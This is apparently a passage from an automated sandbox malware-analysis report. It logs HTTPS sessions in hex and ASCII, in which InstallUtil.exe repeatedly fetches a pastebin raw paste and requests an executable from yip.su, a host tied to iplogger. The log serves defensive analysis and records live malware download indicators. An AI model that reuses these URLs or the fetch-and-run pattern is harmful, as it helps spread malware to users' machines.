                            Last-Modified: Tue, 10 Sep 2024 16:21:12 GMT
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g3b9y11PUZm3e26xQnUdXHIOAxk2FZa5WWiG1OMrxdyZaqlPDEnLxubhqttE0jDtXPaYOMuBNDmGqofodxCVIdoFc1sPrLi6bsgZSPlk%2Bh7d3RBYZXrXAtM%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8c10bff16e017ca2-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-09-10 16:21:12 UTC471INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                            Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                            2024-09-10 16:21:12 UTC1369INData Raw: 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d
                            Data Ascii: r" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property=
                            2024-09-10 16:21:12 UTC1369INData Raw: 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e
                            Data Ascii: lor:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0.
                            2024-09-10 16:21:12 UTC1369INData Raw: 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b 5f
                            Data Ascii: gentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);_
                            2024-09-10 16:21:12 UTC1369INData Raw: 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61
                            Data Ascii: yle>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-ra
                            2024-09-10 16:21:12 UTC1369INData Raw: 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f
                            Data Ascii: argin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="do
                            2024-09-10 16:21:12 UTC154INData Raw: 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: .position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                            2024-09-10 16:21:12 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            7192.168.2.1149719104.20.3.2354437848C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            TimestampBytes transferredDirectionData
                            2024-09-10 16:21:17 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                            Host: pastebin.com
                            Connection: Keep-Alive
                            2024-09-10 16:21:17 UTC222INHTTP/1.1 200 OK
                            Date: Tue, 10 Sep 2024 16:21:17 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Frame-Options: SAMEORIGIN
                            Server: cloudflare
                            CF-RAY: 8c10c01188955e6a-EWR
                            2024-09-10 16:21:17 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                            Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                            2024-09-10 16:21:17 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                            Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                            2024-09-10 16:21:17 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                            Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                            2024-09-10 16:21:17 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                            Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                            2024-09-10 16:21:17 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            8192.168.2.1149720188.114.97.34437848C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            TimestampBytes transferredDirectionData
                            2024-09-10 16:21:18 UTC65OUTGET /RNWPd.exe HTTP/1.1
                            Host: yip.su
                            Connection: Keep-Alive
                            2024-09-10 16:21:18 UTC902INHTTP/1.1 200 OK
                            Date: Tue, 10 Sep 2024 16:21:18 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            memory: 0.36197662353515625
                            expires: Tue, 10 Sep 2024 16:21:18 GMT
                            strict-transport-security: max-age=604800
                            strict-transport-security: max-age=31536000
                            content-security-policy: img-src https: data:; upgrade-insecure-requests
                            x-frame-options: SAMEORIGIN
                            Cache-Control: max-age=14400
                            CF-Cache-Status: HIT
                            Age: 0
                            Last-Modified: Tue, 10 Sep 2024 16:21:18 GMT
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rgBxnQ6LIGsycRi7LfUPZQEFnpLHWYrXOUgUhpBjgCjb2E%2F6GNgYj21%2BxP9fCos8J%2BP9FOGEGGHKooRoaUgQYMRa8at7l4ojXSaAkwr7l2fqf5M32kp65NA%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8c10c0160c698c60-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-09-10 16:21:18 UTC467INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                            Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                            2024-09-10 16:21:18 UTC1369INData Raw: 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65
                            Data Ascii: after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta prope
                            2024-09-10 16:21:18 UTC1369INData Raw: 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61
                            Data Ascii: d-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-dela
                            2024-09-10 16:21:18 UTC1369INData Raw: 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d
                            Data Ascii: serAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(nam
                            2024-09-10 16:21:18 UTC1369INData Raw: 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65
                            Data Ascii: <style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;borde
                            2024-09-10 16:21:18 UTC1369INData Raw: 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64
                            Data Ascii: px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id
                            2024-09-10 16:21:18 UTC158INData Raw: 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: tyle.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                            2024-09-10 16:21:18 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            9192.168.2.1149721104.20.3.2354437848C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            TimestampBytes transferredDirectionData
                            2024-09-10 16:21:23 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                            Host: pastebin.com
                            Connection: Keep-Alive
                            2024-09-10 16:21:23 UTC222INHTTP/1.1 200 OK
                            Date: Tue, 10 Sep 2024 16:21:23 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Frame-Options: SAMEORIGIN
                            Server: cloudflare
                            CF-RAY: 8c10c035c8fd4241-EWR
